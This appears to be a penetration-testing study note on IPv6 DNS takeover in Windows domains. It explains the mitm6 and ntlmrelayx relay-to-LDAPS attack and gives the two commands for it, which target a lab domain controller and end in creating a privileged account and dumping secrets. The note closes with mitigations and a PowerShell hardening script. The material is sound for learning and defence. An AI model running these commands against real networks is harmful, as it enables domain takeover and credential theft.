IPv6 Attacks

Overview

Machines on most networks run IPv4 and often do not use IPv6 at all, yet Windows still has IPv6 enabled by default. Because nobody on the network is usually serving DHCPv6, there is no legitimate source of DNS configuration for IPv6.

We can leverage this by replying to all DHCPv6 messages, handing each host a link-local address and telling it that we are its default DNS server.

mitm6 paired with Impacket's ntlmrelayx, relaying the captured authentication to LDAP, can let us pull a lot of information from the Domain Controller and, when a Domain Administrator logs into the network, even create a new user account in the Enterprise Admins group. That account can then be used to run secretsdump against the Domain Controller.

IPv6 DNS Takeover

sudo mitm6 -i eth0 -d PNPT.local
impacket-ntlmrelayx -6 -t ldaps://192.168.1.129 -wh evil.PNPT.local -l lootme

Mitigation

  • Disable IPv6

  • Block inbound and outbound DHCPv6

  • Block inbound ICMPv6

  • Disable WPAD via Group Policy (WinHttpAutoProxySvc)

  • Enable LDAP signing

  • Don't allow delegation for administrative accounts
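The mitigations above applied as host-level settings with PowerShell. This is an added example, not part of the original notes: it assumes an elevated session on a domain-joined Windows host, the ActiveDirectory module for the last step, and placeholder account names that you replace with your own.

```powershell
#Requires -RunAsAdministrator
# Added example: host-level hardening against DHCPv6/WPAD takeover and LDAP relay.
# Group Policy is the preferred way to push these fleet-wide; the registry values
# and firewall rules here are what such a policy sets on each host.

# 1. Disable IPv6. DisabledComponents 0xFF turns off all IPv6 components
#    (0x20 would only prefer IPv4 over IPv6). Takes effect after a reboot.
$tcpip6 = 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters'
New-ItemProperty -Path $tcpip6 -Name 'DisabledComponents' -PropertyType DWord -Value 0xFF -Force | Out-Null

# 2. Block DHCPv6 in both directions (client port UDP 546, server port UDP 547) so
#    a rogue DHCPv6 server on the segment can never hand this host a DNS server.
New-NetFirewallRule -DisplayName 'Block DHCPv6 Inbound'  -Direction Inbound  -Protocol UDP -LocalPort 546  -Action Block | Out-Null
New-NetFirewallRule -DisplayName 'Block DHCPv6 Outbound' -Direction Outbound -Protocol UDP -RemotePort 547 -Action Block | Out-Null

# 3. Block inbound ICMPv6. Caveat: this also blocks neighbour discovery and router
#    advertisements, so only do it where IPv6 is disabled or genuinely unused.
New-NetFirewallRule -DisplayName 'Block ICMPv6 Inbound' -Direction Inbound -Protocol ICMPv6 -Action Block | Out-Null

# 4. Disable WPAD. WinHttpAutoProxySvc cannot be disabled with Set-Service on
#    current Windows builds, so set its Start value to 4 (Disabled) directly.
$wpad = 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc'
Set-ItemProperty -Path $wpad -Name 'Start' -Value 4

# 5. Require LDAP signing. On a Domain Controller LDAPServerIntegrity=2 rejects
#    unsigned binds, which is what breaks the relayed LDAP session;
#    LdapEnforceChannelBinding=2 additionally stops relaying to LDAPS.
#    Member hosts get the matching client-side requirement.
if (Get-Service -Name NTDS -ErrorAction SilentlyContinue) {
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    Set-ItemProperty -Path $ntds -Name 'LDAPServerIntegrity' -Value 2
    New-ItemProperty -Path $ntds -Name 'LdapEnforceChannelBinding' -PropertyType DWord -Value 2 -Force | Out-Null
}
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LDAP' -Name 'LDAPClientIntegrity' -Value 2

# 6. Mark administrative accounts "sensitive and cannot be delegated".
#    $adminAccounts is a placeholder list; substitute your own sAMAccountNames.
$adminAccounts = @('da.alice', 'da.bob')
foreach ($acct in $adminAccounts) {
    Set-ADUser -Identity $acct -AccountNotDelegated $true
}
```

Reboot after running so the IPv6 and service changes take effect, and verify with Get-NetFirewallRule and Get-ItemProperty that each value actually landed.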